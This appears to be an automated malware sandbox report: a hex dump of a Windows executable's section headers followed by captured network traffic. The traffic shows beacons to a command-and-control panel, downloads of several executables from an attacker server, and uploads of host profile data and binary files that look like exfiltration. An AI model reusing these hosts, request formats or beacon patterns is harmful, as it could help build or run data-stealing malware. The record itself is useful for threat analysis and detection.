00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016875001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016876001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016877001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016878001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 502431Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 31 38 38 37 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 36 38 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016879001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /WEIsmPfDcpBFJozngnYN1734366322?argument=W5I04RJg8H8zmx9g1734518880 HTTP/1.1Host: home.twentytk20pn.topAccept: */*
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20pn.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------rMax4SAkNHGr8ofaH0KIJhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 4d 61 78 34 53 41 6b 4e 48 47 72 38 6f 66 61 48 30 4b 49 4a 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 75 6d 75 64 65 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ec ce e5 cd 8e e5 b5 10 5d e2 f4 eb ea 90 8f dc 72 7a 3d ed f5 5a d9 6b 67 27 2c 97 d4 63 aa dc 23 a9 5e f3 14 b1 82 8b d1 24 17 23 8e 6c 3e cf aa 12 99 a8 fc 7b 02 4c 19 6e 5c 01 0c 09 2a ae 80 77 8b a9 a1 1d 44 bb d5 b6 23 d0 60 b4 3a 82 ac 3a ec 8d bb 2a 3b 18 c9 72 13 65 f2 68 45 f9 53 59 d4 78 1f 66 97 56 e4 41 db 86 9f 04 6f 4e 2a 9b 6d 1c 92 6d bb 7c 2f 10 63 0e 94 0e 26 0c f2 9c f8 55 3a f6 b0 8a 27 a4 3b 1e 35 94 af c7 55 b2 cf 0d 32 f5 75 89 42 cd b5 52 50 c0 b2 44 2b a6 bc e8 8f 72 88 12 3f c1 f4 ee ca 09 dc bd f5 1b 26 fa 7d b2 2a 8a eb be e7 74 ca d4 60 53 7e 79 46 b0 06 46 94 df 99 86 58 e7 c3 e0 1d 4b dc 0f 31 64 59 bd 95 00 6b 34 eb 14 80 f4 df 97 3e 4d 8b 70 df 02 85 d8 a5 31 72 2a ce 16 2e d3 e2 83 13 0e b1 72 7e 1d 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 72 4d 61 78 34 53 41 6b 4e 48 47 72 38 6f 66 61 48 30 4b 49 4a 68 2d 2d 0d 0a Data Ascii: --------------------------rMax4SAkNHGr8ofaH0KIJhContent-Disposition: form-data; name="file"; filename="Xumudep.bin"Content-Type: application/octet-stream]rz=Zkg',c#^$#l>{Ln\*wD#`::*;rehESYxfVAoN*mm|/c&U:';5U2uBRPD+r?&}*t`S~yFFXK1dYk4>Mp1r*.r~--------------------------rMax4SAkNHGr8ofaH0KIJh--
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20pn.topAccept: */*Content-Length: 76978Content-Type: multipart/form-data; boundary=------------------------psxOhntH9I6CMXCWAl9J9eData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 73 78 4f 68 6e 74 48 39 49 36 43 4d 58 43 57 41 6c 39 4a 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 61 67 61 63 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a f4 b4 86 3e 2d 41 f1 e9 26 96 53 41 5f 6d c6 57 20 c2 2d 8c b4 ab 0f 9e d3 dc ce 38 5b 18 20 29 06 51 2f 8e 22 e5 0f ae 23 5a 03 f0 dc 8c 6e d5 c5 7c c2 14 b0 2a 35 1e ed 3c 55 50 53 fa 89 f6 f1 b5 b1 d7 ec f9 9b e2 31 f3 2a 20 a6 50 7d 8c ab 3d 49 6f a9 8b 64 24 65 1f 1b 6a c6 f2 25 6a 36 cf 9e c1 08 7b 64 e9 df 5e f8 2a ae 63 0c f2 b7 a7 44 61 02 f0 ec e8 02 85 92 28 63 cb 8e 14 59 ec 8f 7c 81 8f 20 6b 4c d8 0d 4d ac 8b 1f 35 a1 6c d4 85 c1 c4 e6 a5 67 9b d5 78 3f b3 33 fb ec 4b 1c a3 c8 c1 a6 21 19 31 4f e6 ad 35 86 9c 1e 55 2a 3c cc 70 04 f7 8a 70 4b b7 f1 45 73 95 e7 bf 0b e0 83 3f d8 d4 9e 50 3c 69 0c 8d 46 37 c3 c9 76 24 0d 1e 80 c1 e4 e3 fe 89 9b 1a 3b ee 10 7a 01 94 80 e3 8f 6b f2 00 3d 68 ab f6 d7 0e ee 86 1c dc 38 0e 37 06 ce 62 36 71 e8 c7 6b 0a 6e 44 46 a9 23 a0 6f aa 94 6d ea 10 6b a3 f1 10 90 9a 56 2e 82 c3 86 9c 12 09 0c a3 40 65 db 35 1b 77 76 82 25 0d 1f ae 9c 39 5d e6 7d 05 bd 0d 1d 7e 0d 3f cb 23 71 fd da 15 e8 33 1a 1c 08 c1 73 03 22 18 d8 62 de 9b 29 7f b2 35 93 20 2d b4 a9 3d 00 2f e8 1f 9b 13 34 34 c2 7c 66 58 32 a2 a6 c1 ab 80 56 57 1c 17 ab 63 dd af b2 0a e2 78 8c a3 01 02 b1 7e fc bd 50 5f 4f f1 69 92 83 4f 0c b5 8d c3 c4 14 25 be ec 79 9e e5 ed 86 c1 21 51 66 b1 b2 23 d6 98 b6 31 fa f7 e3 17 3d 6d 21 1d 54 0e d7 18 f8 ff 41 4c 29 2c f1 3c ac 62 2f b1 82 8d 31 17 4c ae 96 07 9f 45 e5 45 d4 13 28 37 a1 c8 21 e2 cf f6 b3 08 95 7e 77 fb d4 35 df 53 61 2a 67 8e 04 dc af 2d a6 af 97 35 a8 a4 b2 79 e2 5d 47 bc bf ca 4a 48 58 21 ef a3 7d 8d af ae c7 72 fa 35 bd bb 84 d8 d5 db 74 87 6d 91 65 74 22 fb 65 4a b6 5a 69 76 ae e0 43 07 55 ea a3 5f 05 27 af 78 ff b9 3e e2 c8 23 f4 a3 f9 47 2c 63 15 8d f5 65 b9 5e ec b5 2a 14 10 18 64 a2 f1 e3 d6 b0 e6 a9 fb 1f b2 db 29 b3 a5 fe 58 39 f1 8b 8f 08 30 8b 71 1c 01 3b a4 a9 c8 db 18 ac 71 38 7c a3 36 08 38 f6 67 ea a6 fe 2a 03 ce f8 4f 88 77 e0 9f 15 cd 19 2b 26 33 11 bf 6a c7 fb 5f 97 a0 25 1d 4e a5 9e ff 59 56 e7 db 26 09 01 84 0d 89 46 6a cd 15 35 60 10 cd e0 10 02 e8 9f 12 a5 7f c0 31 15 21 66 67 3e ff f5 ed 58 5d 53 c6 cc 61 f5 19 03 e3 51 33 96 b5 b8 8c 90 a5 77 7b 77 dd b5 a3 ef 0d 66 25 66 c5 88 f7 91 44 09 79 1f 64 b5 e7 83 54 90 5f 94 df 36 87 be 24 c5 6f 10 a6 37 24 ed 8b bb 4c a9 b8 91 1c 63 0d 1c 62 48 51 05 d8 0f 1f 06 08 68 85 72 58 f0 56 8e 00 8f 85 c5 bd fb d3 6f 22 e1 ef 49 5f 6f 2e b4 b6 a6 4a 6c e7 ec 9c da 00
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                            Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20pn.topAccept: */*Content-Length: 30407Content-Type: multipart/form-data; boundary=------------------------CCm8LMigJGORbWBQdmSru4Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 43 43 6d 38 4c 4d 69 67 4a 47 4f 52 62 57 42 51 64 6d 53 72 75 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 69 6e 6f 72 75 66 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d0 01 c7 10 0a b6 ae f8 34 08 50 ef 84 36 e0 26 34 1e 9c 88 90 9b b0 39 8a 47 fe 59 a9 4e 75 30 08 75 85 d9 40 bf a1 85 91 b3 f0 b7 da ed 21 09 6e cf 29 ef da cc c2 ae 22 5f f6 de c6 0a f9 c3 cf 17 24 b6 04 57 8b 3e 47 88 8f f2 f4 04 de e5 d4 77 6f f8 60 79 0f 2a 28 25 53 89 bc 67 41 0f d7 d9 d9 60 bb 3c a1 73 34 28 e8 6e bd 98 af 65 4b d5 94 21 b0 d7 87 5a 56 28 05 d8 91 93 6c bc 12 35 97 62 d8 4e c4 d0 af 64 c8 3d b9 9e a6 9c 76 e7 03 90 87 77 f5 90 53 3b 14 ba 48 f0 c5 da 7b cf 5b 29 69 9d b7 49 10 80 a2 06 90 c3 c8 49 c9 47 f6 37 d0 70 cb 08 3d 51 04 9f c4 a6 07 ac a0 83 8f 85 fa 86 31 71 cb bc da b2 68 f3 f6 cd ce cc aa 59 8e 3d 1b 6f be 04 7b aa 2d c1 75 19 b6 cf b9 ee 09 74 71 71 4f 1a 12 60 19 98 fa c3 3f 96 bc 84 1d af 8e cb a0 6d ed 46 78 2b ee 0e f1 dd 53 cc e6 53 36 b2 76 01 83 33 38 c9 01 0a b7 a2 2f 44 01 61 ea 05 48 88 b3 ef d5 60 39 b0 84 4b 5f a7 7a 09 4b cb 78 c7 9e 6b da 32 1c 65 6e 73 af 6e 36 33 9e 0d a1 f0 4c 21 d1 f7 a3 0f 18 61 8e 4a a2 ef da c2 40 b4 f7 81 36 3f bf 5e b7 3b 50 a6 19 07 80 72 b5 2c ca 08 be 83 82 d9 cd 13 26 5e 34 2f 3b 08 c5 f5 72 33 0a 1c 5c 55 c8 34 ee 91 30 27 84 54 41 ef 66 e7 f0 cc 92 4e 34 b8 89 70 c3 79 08 bf 4a b3 35 74 e5 b1 05 e2 c9 0e 86 51 1e 81 91 72 b3 cc bc bd 93 06 4e 5d 20 d7 5f b9 46 b9 10 00 0f 86 96 e5 a6 9a a3 8d e6 13 fd 7f 82 1f 02 84 db 44 56 f1 ca 79 2d 6e 46 ac 73 de 26 01 4a d7 57 bc a6 3d 75 63 85 ec 96 5e 19 c4 66 49 8f 57 64 d7 d0 0a c2 b2 0d 7c 88 c1 8c 15 e7 55 3b e7 45 cc 2c 41 30 c9 81 e3 15 59 8b a7 07 95 28 60 fa 21 bc 7a 34 a4 7f f4 4d 35 1b 63 3f 76 da 3e 27 6a 03 2a 79 e4 a3 ef eb 91 9c 9b 3a 29 22 c7 b4 fa e7 46 6c e4 84 20 48 e9 67 ca cd 76 3c 38 91 ae e0 be 0c 8e e2 97 1c 75 0d 57 6e a8 a0 37 0e c6 f4 8b 1f ed 74 e3 87 db 98 8d 58 19 87 48 71 9f 8c a0 64 8a 56 ef 38 19 83 c3 ee 2c f3 05 bc f7 59 77 30 23 87 b7 e2 c0 1d 4c 04 ca 87 f0 7b 12 a8 35 db f4 46 8d ab 48 bc 91 22 b7 3b bf 96 ce f2 63 87 f1 6a 5c 97 04 4f 3a 92 38 d7 ca 8f 28 16 94 20 e3 cd e0 98 cb 4b 5c d3 fa fa a8 2a e8 12 d7 60 e3 c9 db c6 4f e2 47 ea 88 c4 33 d9 b2 0c e5 ad 5c ef c1 ee b2 8e cc 59 71 d8 1b 67 de 3e 3a 8d 2f 80 da 32 fe 